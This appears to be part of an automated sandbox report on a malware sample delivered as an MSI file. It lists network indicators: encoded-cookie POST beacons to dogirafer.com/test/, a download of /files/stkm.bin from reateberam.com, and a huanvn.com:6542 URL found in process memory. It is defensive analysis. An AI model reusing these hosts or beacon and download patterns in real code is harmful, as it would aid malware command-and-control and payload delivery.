Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hlZQqczCa1wndZbQ+OUCyobPa0vSG5YVbTlGf+p2/T7/2fw0UYVEQrfZGTlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgbUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hlZAqczCa1wndZbQ+OUCyobPa0vSG5YVbTlGf+p2/T7/2fw0UYVEQrfZGTlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgbUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hlawqczCa1wndZbQ+OUCyobPa0vSG5YVbTlGf+p2/T7/2fw0UYVEQrfZGTlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgbUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Windows\explorer.exe

Code function: 9_2_0137900C InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,

9_2_0137900C

Source: global traffic	HTTP traffic detected: GET /files/stkm.bin HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.com
Source: global traffic	HTTP traffic detected: GET /files/stkm.bin HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/stkm.bin HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.com

Source: global traffic	DNS traffic detected: DNS query: huanvn.com
Source: global traffic	DNS traffic detected: DNS query: reateberam.com
Source: global traffic	DNS traffic detected: DNS query: dogirafer.com

Source: unknown

HTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hmdViRxTPtzmAYfxODCSSuZ/ixuVPIFlepnGOM0WzS6oybw0EcJUYteOH33B0vDqTu8/JSvpK54Ytrr38FQTZAtZz+ZBAGQU8QSEm34sPNSmXfsGBKY94e4q9ghg3hs+aED3dzoROjTHWGSpduCai2cFhEPuKCKywztNgbUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 92Cache-Control: no-cache

Source: zdi.txt.msi, MSI471C.tmp.1.dr, MSI48D4.tmp.1.dr, MSI473C.tmp.1.dr, MSI468D.tmp.1.dr, 424593.msi.1.dr, MSI46EC.tmp.1.dr, MSI4808.tmp.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: explorer.exe, 00000009.00000002.4131028570.0000000009833000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2052116683.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2053703533.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3113996324.0000000009830000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3461728265.0000000009830000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: zdi.txt.msi, MSI471C.tmp.1.dr, MSI48D4.tmp.1.dr, MSI473C.tmp.1.dr, MSI468D.tmp.1.dr, 424593.msi.1.dr, MSI46EC.tmp.1.dr, MSI4808.tmp.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: zdi.txt.msi, MSI471C.tmp.1.dr, MSI48D4.tmp.1.dr, MSI473C.tmp.1.dr, MSI468D.tmp.1.dr, 424593.msi.1.dr, MSI46EC.tmp.1.dr, MSI4808.tmp.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: explorer.exe, 00000009.00000002.4131028570.0000000009833000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2052116683.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2053703533.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3113996324.0000000009830000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3461728265.0000000009830000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: zdi.txt.msi, MSI471C.tmp.1.dr, MSI48D4.tmp.1.dr, MSI473C.tmp.1.dr, MSI468D.tmp.1.dr, 424593.msi.1.dr, MSI46EC.tmp.1.dr, MSI4808.tmp.1.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: zdi.txt.msi, MSI471C.tmp.1.dr, MSI48D4.tmp.1.dr, MSI473C.tmp.1.dr, MSI468D.tmp.1.dr, 424593.msi.1.dr, MSI46EC.tmp.1.dr, MSI4808.tmp.1.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: explorer.exe, 00000009.00000002.4131028570.0000000009833000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2052116683.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2053703533.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3113996324.0000000009830000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3461728265.0000000009830000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: zdi.txt.msi, MSI471C.tmp.1.dr, MSI48D4.tmp.1.dr, MSI473C.tmp.1.dr, MSI468D.tmp.1.dr, 424593.msi.1.dr, MSI46EC.tmp.1.dr, MSI4808.tmp.1.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: explorer.exe, 00000009.00000003.3114928879.00000000079D3000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/
Source: explorer.exe, 00000009.00000003.3113996324.0000000009830000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3461728265.0000000009830000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab
Source: explorer.exe, 00000009.00000003.3113996324.0000000009830000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3461728265.0000000009830000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cabH
Source: explorer.exe, 00000009.00000002.4131028570.0000000009833000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2052116683.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2053703533.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3113996324.0000000009830000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3461728265.0000000009830000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: zdi.txt.msi, MSI471C.tmp.1.dr, MSI48D4.tmp.1.dr, MSI473C.tmp.1.dr, MSI468D.tmp.1.dr, 424593.msi.1.dr, MSI46EC.tmp.1.dr, MSI4808.tmp.1.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: zdi.txt.msi, MSI471C.tmp.1.dr, MSI48D4.tmp.1.dr, MSI473C.tmp.1.dr, MSI468D.tmp.1.dr, 424593.msi.1.dr, MSI46EC.tmp.1.dr, MSI4808.tmp.1.dr	String found in binary or memory: http://ocsp.digicert.com0O
Source: explorer.exe, 00000009.00000000.2052116683.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4127934640.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: rundll32.exe, 00000005.00000003.2808932864.0000023CD8BEC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2049365598.0000023CD8BE7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2809051343.0000023CD8BB8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2049378900.0000023CD8BB8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2808932864.0000023CD8BEA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.4125363577.0000023CD8BB8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://r10.i.lencr.org/0
Source: rundll32.exe, 00000005.00000003.2808932864.0000023CD8BEC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2049365598.0000023CD8BE7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2809051343.0000023CD8BB8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2049378900.0000023CD8BB8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2808932864.0000023CD8BEA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.4125363577.0000023CD8BB8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://r10.o.lencr.org0#
Source: explorer.exe, 00000009.00000002.4131028570.0000000009833000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2053703533.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3113996324.0000000009830000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3461728265.0000000009830000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.mi
Source: explorer.exe, 00000009.00000002.4131028570.0000000009833000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2053703533.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3113996324.0000000009830000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3461728265.0000000009830000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.micr
Source: explorer.exe, 00000009.00000002.4132205195.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000002.4129592451.0000000007F40000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.2053182664.0000000008720000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://schemas.micro
Source: zdi.txt.msi, MSI471C.tmp.1.dr, MSI48D4.tmp.1.dr, MSI473C.tmp.1.dr, MSI468D.tmp.1.dr, 424593.msi.1.dr, MSI46EC.tmp.1.dr, MSI4808.tmp.1.dr	String found in binary or memory: http://t1.symcb.com/ThawtePCA.crl0
Source: zdi.txt.msi, MSI471C.tmp.1.dr, MSI48D4.tmp.1.dr, MSI473C.tmp.1.dr, MSI468D.tmp.1.dr, 424593.msi.1.dr, MSI46EC.tmp.1.dr, MSI4808.tmp.1.dr	String found in binary or memory: http://t2.symcb.com0
Source: zdi.txt.msi, MSI471C.tmp.1.dr, MSI48D4.tmp.1.dr, MSI473C.tmp.1.dr, MSI468D.tmp.1.dr, 424593.msi.1.dr, MSI46EC.tmp.1.dr, MSI4808.tmp.1.dr	String found in binary or memory: http://tl.symcb.com/tl.crl0
Source: zdi.txt.msi, MSI471C.tmp.1.dr, MSI48D4.tmp.1.dr, MSI473C.tmp.1.dr, MSI468D.tmp.1.dr, 424593.msi.1.dr, MSI46EC.tmp.1.dr, MSI4808.tmp.1.dr	String found in binary or memory: http://tl.symcb.com/tl.crt0
Source: zdi.txt.msi, MSI471C.tmp.1.dr, MSI48D4.tmp.1.dr, MSI473C.tmp.1.dr, MSI468D.tmp.1.dr, 424593.msi.1.dr, MSI46EC.tmp.1.dr, MSI4808.tmp.1.dr	String found in binary or memory: http://tl.symcd.com0&
Source: explorer.exe, 00000009.00000000.2052116683.00000000079B1000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: zdi.txt.msi, MSI471C.tmp.1.dr, MSI48D4.tmp.1.dr, MSI473C.tmp.1.dr, MSI468D.tmp.1.dr, 424593.msi.1.dr, MSI46EC.tmp.1.dr, MSI4808.tmp.1.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: rundll32.exe, 00000005.00000003.2049365598.0000023CD8BE7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2809051343.0000023CD8BB8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2049378900.0000023CD8BB8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2808932864.0000023CD8BEA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.4125363577.0000023CD8BB8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: rundll32.exe, 00000005.00000003.2049365598.0000023CD8BE7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2809051343.0000023CD8BB8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2049378900.0000023CD8BB8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2808932864.0000023CD8BEA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.4125363577.0000023CD8BB8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: explorer.exe, 00000009.00000000.2056295568.000000000C893000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
Source: explorer.exe, 00000009.00000000.2052116683.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3462488864.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4127934640.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3114928879.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3618520835.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/Vh5j3k
Source: explorer.exe, 00000009.00000000.2052116683.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3462488864.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4127934640.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3114928879.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3618520835.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/odirmr
Source: explorer.exe, 00000009.00000000.2056295568.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 00000009.00000002.4131028570.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2053703533.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 00000009.00000002.4131028570.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2053703533.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/q
Source: explorer.exe, 00000009.00000000.2051282455.0000000003700000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3618653369.000000000371D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4125057147.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4126668023.0000000003700000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3462615856.000000000371D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3115088223.000000000371C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2050728956.0000000001240000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 00000009.00000000.2053703533.00000000096DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4131028570.0000000009702000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?&
Source: explorer.exe, 00000009.00000002.4127934640.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2052116683.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc
Source: explorer.exe, 00000009.00000002.4131028570.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4127934640.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2053703533.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2052116683.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: explorer.exe, 00000009.00000000.2053703533.00000000096DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4131028570.0000000009702000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://arc.msn.comi
Source: explorer.exe, 00000009.00000000.2052116683.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
Source: explorer.exe, 00000009.00000000.2052116683.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
Source: explorer.exe, 00000009.00000000.2052116683.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
Source: explorer.exe, 00000009.00000002.4127934640.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2052116683.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg
Source: explorer.exe, 00000009.00000002.4127934640.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2052116683.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
Source: explorer.exe, 00000009.00000002.4127934640.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2052116683.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
Source: explorer.exe, 00000009.00000000.2052116683.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4127934640.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu
Source: explorer.exe, 00000009.00000000.2052116683.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4127934640.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark
Source: explorer.exe, 00000009.00000002.4127934640.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2052116683.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu
Source: explorer.exe, 00000009.00000002.4127934640.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2052116683.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark
Source: explorer.exe, 00000009.00000002.4127934640.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2052116683.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY
Source: explorer.exe, 00000009.00000002.4127934640.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2052116683.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark
Source: explorer.exe, 00000009.00000003.3460642959.000000000CB92000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3460184763.000000000CB51000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3461113285.000000000132C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4139893118.000000000CB92000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4137653030.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3460184763.000000000CB92000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4131878847.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3461404501.000000000CB92000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://dogirafer.com/
Source: explorer.exe, 00000009.00000002.4137653030.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://dogirafer.com/3p
Source: explorer.exe, 00000009.00000002.4137653030.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://dogirafer.com/6122658-3693405117-2476756634-1002
Source: explorer.exe, 00000009.00000003.3460642959.000000000CB92000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4139893118.000000000CB92000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3460184763.000000000CB92000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3461404501.000000000CB92000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://dogirafer.com/=
Source: explorer.exe, 00000009.00000003.3461113285.000000000132C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dogirafer.com/A
Source: explorer.exe, 00000009.00000003.3461113285.000000000132C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dogirafer.com/V=
Source: explorer.exe, 00000009.00000003.3461113285.000000000132C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dogirafer.com/est/-
Source: explorer.exe, 00000009.00000002.4131878847.00000000098A8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://dogirafer.com/est/mX
Source: explorer.exe, 00000009.00000003.3460642959.000000000CB92000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3460184763.000000000CB92000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3461404501.000000000CB92000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://dogirafer.com/gs
Source: explorer.exe, 00000009.00000002.4131878847.00000000098A8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://dogirafer.com/st/
Source: explorer.exe, 00000009.00000003.3460642959.000000000CB92000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2935138310.0000000003460000.00000040.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4125816199.000000000308D000.00000004.00000010.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3462458492.000000000C98F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3461113285.000000000132C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3116501774.0000000008FB0000.00000040.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3165319740.0000000003460000.00000040.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4139642747.000000000CA4F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4139893118.000000000CB92000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3460184763.000000000CB92000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4131878847.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3188591617.0000000008830000.00000040.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3210130815.0000000008B70000.00000040.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3461404501.000000000CB92000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://dogirafer.com/test/
Source: explorer.exe, 00000009.00000003.3460642959.000000000CB92000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4139893118.000000000CB92000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3460184763.000000000CB92000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3461404501.000000000CB92000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://dogirafer.com/test/-
Source: explorer.exe, 00000009.00000002.4131878847.00000000098A8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://dogirafer.com/test/1b87bd06
Source: explorer.exe, 00000009.00000002.4125057147.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3461113285.000000000132C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3618284131.0000000001332000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dogirafer.com/test/Q
Source: explorer.exe, 00000009.00000003.3460184763.000000000CAB3000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://dogirafer.com/test/p
Source: explorer.exe, 00000009.00000002.4131878847.00000000098A8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://dogirafer.com/vider
Source: explorer.exe, 00000009.00000002.4137653030.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2056295568.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://excel.office.com
Source: rundll32.exe, 00000005.00000002.4125203904.0000023CD8B80000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2049440069.0000023CD8B80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://huanvn.com/
Source: rundll32.exe, 00000005.00000002.4125203904.0000023CD8B80000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2049440069.0000023CD8B80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://huanvn.com/a
Source: rundll32.exe, 00000005.00000002.4125203904.0000023CD8B80000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2809051343.0000023CD8BB8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2049378900.0000023CD8BB8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.4125113963.0000023CD8B0F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.4125363577.0000023CD8BB8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2049440069.0000023CD8B80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://huanvn.com:6542/stop.php
Source: rundll32.exe, 00000005.00000003.2049378900.0000023CD8BB8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://huanvn.com:6542/stop.phpF
